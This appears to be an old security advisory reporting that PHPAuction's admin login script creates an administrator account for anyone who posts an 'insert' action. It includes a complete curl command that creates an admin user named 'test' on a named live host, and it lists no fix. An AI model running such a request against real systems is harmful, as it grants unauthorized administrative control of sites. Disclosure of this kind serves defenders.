COMMAND

	PHPAuction allows anyone to create admin account for this software

SYSTEMS AFFECTED

	All release up till today (03 July 2002) ?

PROBLEM

	ethx says :
	

	File  /admin/login.php  checks  only  that  there  is  $action  set   to
	\"insert\" and then goes ahead and inserts  username  and  password  (if
	both are provided) in adminUsers table.
	

	The following line added admin user  with  username  test  and  password
	test
	

	curl

	http://pro.phpauction.org/proplus/admin/login.php -d

	\"action=insert\" -d \"username=test\" -d \"password=test\"

	

SOLUTION

	None yet